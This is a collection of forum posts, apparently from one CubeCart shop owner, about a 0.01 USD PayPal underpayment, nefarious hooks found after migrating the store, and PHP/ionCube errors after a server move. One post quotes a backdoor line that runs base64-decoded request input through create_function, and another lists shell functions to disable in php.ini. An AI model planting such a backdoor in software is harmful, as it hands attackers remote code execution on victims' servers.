[Order allowed to complete with insufficient PayPal payment]

Greetings all

I posted a Github issue but have not heard back so I'd like to see if there is prior experience with this.  My spouse has a CC store with embroidery designs; all digital downloads.  This morning a user rang up every single design in the store into a sale worth hundreds of dollars but only paid 0.01USD and CC approved it.

I find it hard to believe I'm the first victim of this but I don't understand where things went wrong to allow a payment less than the order total to be approved; surely CC/Paypal Payment module would do a sanity check on the IPN data to make sure the amounts matched up.

I'm not entirely sure what can be posted to ensure I'm not giving away too much information for some ne'er-do-well to capitalize on it.

I checked the webserver logs and the IPN came directly from Paypal's server

Running CC 6.1.8 with Paypal Standard 1.0.5 on NginX using FastCGI+PHP

 

So.. What happened?  Where did it all go wrong?  How do I prevent this from happening in the future?

[Are these hooks legit?]

One more reply for anyone that is looking to secure their php installation in the future; add the following to your php.ini file:

disable_functions =exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec;

 

[Are these hooks legit?]

Thanks for pointing out that there would be an associated file; May 13 2016.  Quite the coincidence that I'd happen to find the exploits exactly one year later.  Unfortunately I don't have the apache logs from that time to review what was done.

Thanks again for the help.

[Are these hooks legit?]

Both hooks are identical; the first is a very simple decode that does a lot of file manipulation.  The second one I don't have enough php wits to crack:

$f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/=')));

Something about replacing a newline but the rest doesn't make much sense in context.

[Are these hooks legit?]

Hello all

I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither but I have a nagging sense that these two hooks I'm seeing may not be part of CC.  To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding.  

They were enabled after the update but I have since disabled them.  Thoughts?

By the way; v6 runs very well on nginx with a few tweaks.

EDIT: Nevermind; I've answered my own question.  I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents".  No way of getting a time period on when they were added so its hard to know if they were present for two weeks or two years.  There is a lot of file manipulation in the decoded script so I'm going to go with 'compromised site'.

[Trouble after server move/software update]

I downgraded to PHP 5.3 and just found ModsIndex has IP resticted my mods to the old server IP 

 

In the meantime, can ya'll set me up with a temporary license key for testing on this domain I'm using?  test.www.cutebykira.com is the domain.  I would appreciate it.  Thank you.

I downgraded to PHP 5.3 and just found ModsIndex has IP resticted my mods to the old server IP 

 

In the meantime, can ya'll set me up with a temporary license key for testing on this domain I'm using?  test.www.cutebykira.com is the domain.  I would appreciate it.  Thank you.

[Trouble after server move/software update]

Thanks for the heads up. I'll go remove the offending mods and report back.

[Trouble after server move/software update]

Good morning,

 

I'm currently in the testing phase for moving my cubecart installation to a new server.  The old server is running 5.2.2 and I was able to upgrade on the new installation to 5.2.14 with minimal issues.  After the install was complete, I got the dreaded blank page issue.  I enabled debugging and I am getting a bunch of these:

 

 

 

( ! ) Fatal error: The file /usr/home/kira/www.cutebykira.com/modules/plugins/social_links/hooks/class.gui.css.php was encoded by the ionCube Encoder for PHP 5 and cannot run under PHP 5.5 or PHP 5.6. Please ask the provider of the script to provide a version encoded with the ionCube Encoder for either PHP 5.3 or PHP 5.4 or PHP 5.5. in Unknown on line 0 Call Stack # Time Memory Function Location 1 0.0000 227992 {main}( ) ../index.php:0 2 0.0003 256696 include( '/usr/home/kira/www/controllers/controller.master.inc.php' ) ../index.php:9 3 0.0012 504136 include( '/usr/home/kira/www/controllers/controller.index.inc.php' ) ../php_5.4.php:434 4 0.0143 2892328 GUI::getInstance( ) ../controller.index.inc.php:45 5 0.0143 2894544 GUI->__construct( ) ../gui.class.php:236

 

I hope I don't need to downgrade php in order to continue using CubeCart.

 

Some info:

 

 

 

Apache Version Apache/2.4.10 (FreeBSD) PHP/5.6.2 Apache API Version 20120211 Server Administrator webmaster@ Hostname:Port test.www:0 User/Group www(80)/80 Max Requests Per Child: 0 - Keep Alive: on - Max Per Connection: 100 Timeouts Connection: 60 - Keep-Alive: 5 Virtual Server Yes Server Root /usr/local Loaded Modules core mod_so http_core worker mod_authn_file mod_authn_core mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_core mod_access_compat mod_auth_basic mod_reqtimeout mod_filter mod_mime mod_log_config mod_env mod_headers mod_setenvif mod_version mod_unixd mod_status mod_autoindex mod_dir mod_alias mod_rewrite mod_php5

 

 

[php Modules]

bcmath

bz2

Core

ctype

curl

date

dom

ereg

filter

ftp

gd

gettext

hash

iconv

ionCube Loader

json

libxml

mbstring

mcrypt

mhash

mysql

mysqli

mysqlnd

openssl

pcre

PDO

pdo_mysql

pdo_sqlite

Phar

posix

Reflection

session

SimpleXML

soap

sockets

SPL

sqlite3

standard

tokenizer

xdebug

xml

xmlreader

xmlwriter

Zend OPcache

zlib

 

[Zend Modules]

Xdebug

Zend OPcache

the ionCube PHP Loader